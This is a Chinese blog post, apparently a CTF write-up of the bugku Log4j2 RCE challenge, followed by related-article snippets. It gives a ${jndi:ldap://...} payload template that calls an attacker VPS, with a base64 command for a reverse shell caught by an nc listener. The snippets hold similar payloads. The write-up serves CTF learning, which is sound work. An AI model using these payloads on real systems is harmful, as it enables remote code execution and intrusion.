bugku web-Apache Log4j2 RCE

最新推荐文章于 2023-01-06 09:07:30 发布
最新推荐文章于 2023-01-06 09:07:30 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: bugku web 漏洞复现 文章标签: apache 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/122738504
版权
bugku 同时被 3 个专栏收录
69 篇文章 0 订阅
订阅专栏
web
25 篇文章 2 订阅
订阅专栏
漏洞复现
1 篇文章 0 订阅
订阅专栏

一,准备环境
有VPS即可
二,题解
在这里插入图片描述1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的

2,注意
首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar
2.2
vps先允许反弹shell用到的端口在这里插入图片描述2.3,再启动工具
在这里插入图片描述2.4,再开一个窗口监听nc
在这里插入图片描述
2.5,构造payload,根据提示进行利用
将地址改为自己的vps地址,然后将加密后的命令放到末尾

原:${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]} 
加:${jndi:ldap://xxxxxx:1389/Basic/Command/Base64/0NSAtZSAvYmluL3No}

2.6,进行base64后将payload放到登录框的用户名处,密码随便填,提交,成功反弹shell
在这里插入图片描述
2.7,找到flag
在这里插入图片描述
2.8,!关闭监听环境和记得将vps的防火墙规则修改回去

星星明亮
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
bugku---Apache Log4j2 RCE
weixin_43895765的博客
12-15 4578
1.bugku---Apache Log4j2 RCE 1.1 打开题目 注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用 1.2 构建一个JNDI服务 Github: https://github.com/welk1n/JNDI-Injection-Exploit 1.2.1 构建 1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-Exploit
Bugku WEB Apache Log4j2 RCE
qq_41696858的博客
12-13 1934
bugku最近上新了一题log4j2的题,紧跟时代,刷一刷 先简单说一下这个漏洞的原理吧,本质是JNDI注入 需要说的是,这题需要弹VPS,也就是你得有公网IP 通过构造形如${jndi:ldap:}或者${jndi:rmi}之类的恶意payload,可以造成任意命令执行漏洞 防护的常用思路:更新apache2 log4j2版本到2.15以上 一般来说可能造成此漏洞的API包括但不限于logger.info(),logger.error() 具体的调用链可以看这篇https://www.anquanke.c
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4337
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4255
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
Apache Log4j2 RCE漏洞利用反弹shell合集
热门推荐
yy
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
log4j-rce-payload
最新发布
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class Send me:xxx属于...
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 778
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞。
Log4j2-rce-学习
feng的博客
03-04 712
Log4j2-rce-学习 前言 当时漏洞出的时候在准备期末考试就没管,现在重新拾起来。。 exp package com.summer.test; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.LogManager; public class Test { private static final Logger log = LogManager.getLogger(); public st
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7520
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
Apache Log4j2 RCE漏洞复现
huangyongkang666的博客
04-13 1951
Apache Log4j2 RCE漏洞复现 1.漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j 2.x<=2.15.0.rc1 漏洞编号:CVE-2021-44228 2.漏洞环境搭建 目标:Ubuntu ip: 192.168.241.129 攻击机 :kail ip: 192.168.241.128 由于我的Ubuntu虚拟机已经搭建过docker,直接用以下命令
Log4J RCE漏洞
RuiIDS的博客
01-06 699
首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对${这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到${},就会解析其中的字符串尝试使用 JDNI的lookup()方法查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;
Log4j远程执行RCE复现GET和POST
qq_30947463的博客
05-04 1131
从安装docker和vulfocus到漏洞复现
【LOG4J RCE漏洞分享】
努力学习
12-15 2648
LOG4J RCE漏洞分享 先说结论:有中标,原因在于引⼊的Lo4j2 2.10.0 ,应该绝⼤多业务线都有这个问题,毕竟⽇志组件都是⼀个。 漏洞原因:https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues 漏洞复现: ⽇志打印了,也确实远程执⾏了! 那么同理是不是能够通过JNDI:LDAP的⽅式注⼊⼀个类进来执⾏命令,于是我有⼀个⼤胆的想法! 类加载了。。。命令执⾏了 ...
bugku 一段新闻
weixin_46578840的博客
07-19 1052
下载得到一段新闻 我一脸懵逼,啥玩意啊,这个时候看到评论说 隐藏字符加密?那么百度一下看一看,还真有 原理是利用零宽字符对加密文本进行转码,嵌入到普通文本当中,从而隐藏加密内容;表面看起来是一段普通文本,复制粘贴不会丢失 长这样 将文本复制进去 得到社会主义价值观密文,拿去解码,得到flag ...
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值